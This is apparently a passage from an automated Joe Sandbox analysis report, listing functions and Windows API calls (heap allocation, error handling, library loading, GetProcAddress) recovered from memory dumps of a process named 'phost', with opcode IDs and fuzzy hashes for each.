                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                              • Instruction ID: 88a097576592780916cce2bdbbfb4a633a96d504a379eecfbb912931ba418a9a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8E0CD60F0C60392FF16DBFA9C6553A11706FD8BB0F044234C81DC22A2EE3C6895C312
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00007FF62CC8AA45,?,?,00000000,00007FF62CC8AAFA), ref: 00007FF62CC8AC36
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62CC8AA45,?,?,00000000,00007FF62CC8AAFA), ref: 00007FF62CC8AC40
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                              • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction ID: 71713c5413e71548ff9e783cc55ef8f4c1438063c4e8d6133f2a6256f75af0f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A219321F1C64242FEA657699C9067B12B29F84BF4F484339EA2EC77C5CE6CE4458302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                              • Instruction ID: ef09d287a09e8cd73fc19644dbf20ae15d5b4352a4f4c756acca0183ea213856
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0541B132B0960187EE359A1DED50A7B73B4EB55BE4F105231DA8EC7691CF2DE402CB52
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                              • Opcode ID: 8b238289baf9dddcba6bfc48a855cad56bb9a0da69048aaa23f75c3b13f56717
                                                                                                                                                                                                                              • Instruction ID: 0039720059a151118b1f507c689274f688197bc56855f4e79e3fe9b4d6c86197
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b238289baf9dddcba6bfc48a855cad56bb9a0da69048aaa23f75c3b13f56717
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C21D321B0C65285FE119B2A6D087BA9665FF45BE8F8C4430EF0D9B786DE3DE046D702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                              • Instruction ID: 97f1d0c4fecc28903f4903597c344abfd029484504783e5bb07065959d23f5a6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F317E31B1864285EB539B598C61BBE2670AF40BF4F420339E96D933D2DF7CA4818722
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction ID: 5288570d1ffbc8e2ef83e37d5cf275736ad5d9772271ffb1c41ff4d437e66771
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75119632B1C64181FE629F599C0197FA2B1AF45BE0F444231EB4CD7A96DFBDD4008702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                              • Instruction ID: 546a1a177f04ca54416a5c650dd3ac28fe9a4316dc461935a5df6a72e6a73d96
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB215072718A8286DFA19F1CD85077A76B0FB84BA8F548234E69DC76D9DF3CD4008B01
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction ID: b3f33d435726a7e6b37db82cf8507c0968e1e1daa5d36e65d9fb8158fd0a91c2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C018E22B4874141EE06DB5A9D0186AA6A1BF86FF0F488731EE5C97BD6CE3CE0018341
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC79400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62CC745E4,00000000,00007FF62CC71985), ref: 00007FF62CC79439
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00007FF62CC76466,?,00007FF62CC7336E), ref: 00007FF62CC79092
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2592636585-0
                                                                                                                                                                                                                              • Opcode ID: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
                                                                                                                                                                                                                              • Instruction ID: b106c9906828b7c85da1d74e885b20ac85d0cc5c196ad01ca0ef31e64084b84c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86D08C21B2424541EE58E76FBA5A63A5261AF8DBD4E88D035EE0D47B4AEC3CC0518B00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,00000000,00007FF62CC8B39A,?,?,?,00007FF62CC84F81,?,?,?,?,00007FF62CC8A4FA), ref: 00007FF62CC8EC5D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                              • Instruction ID: ece1ba33c3fa5708ee663af6661d0174e02dc0b8614a353cedbb222431c61f67
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AF06298F0924680FE565B6E5C61AB702B05F45BE0F4C4638CD0DC63D1DE1CE8808212
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF62CC80D00,?,?,?,00007FF62CC8236A,?,?,?,?,?,00007FF62CC83B59), ref: 00007FF62CC8D6AA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                              • Instruction ID: b3bd5f2276f108c7148e443b174a34106403ac9e25767aa87aac732a18a42dfd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42F0FE10F0934B95FE6667A95C51A7A12B06F547F0F094B30DD2EC53DADE2CF4808612
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                              • Instruction ID: cf4ca272f6a914803da853a19940e15fae5bc9d9ed0e1b6bf7f070c433a74314
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98315132718F8196EB608F29EC506AE73B4FB84768F544135EA8D87B54DF3CC1458B01
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                              • Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                              • Instruction ID: 9fd4ae548ac1ef3df7c51d4114e7dfce83ccbd1a0ccab4bef7e6d245794e04f3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1B1D662B1C69241EE619B2ADC015BA63B1EB45BF8F448131EE5D87BD5EF3CE441C302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62CC95F1A
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC95668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9567C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62CC95F2B
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC95608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9561C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62CC95F3C
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC95638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9564C
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC8A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC8A9B8: GetLastError.KERNEL32(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9D8
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62CC9617C), ref: 00007FF62CC95F63
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3458911817-0
                                                                                                                                                                                                                              • Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                              • Instruction ID: 487cc8da38f35d392e169b1bd9d713813a4fca92cb90ad373c67ccca4ad9a43b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6351A272B0864296EB20EF29DC815B96770FF487A8F449235EA4DC7796DF3CE4418742
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75830
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75842
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75879
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7588B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758A4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758B6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758CF
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758E1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758FD
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7590F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7592B
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7593D
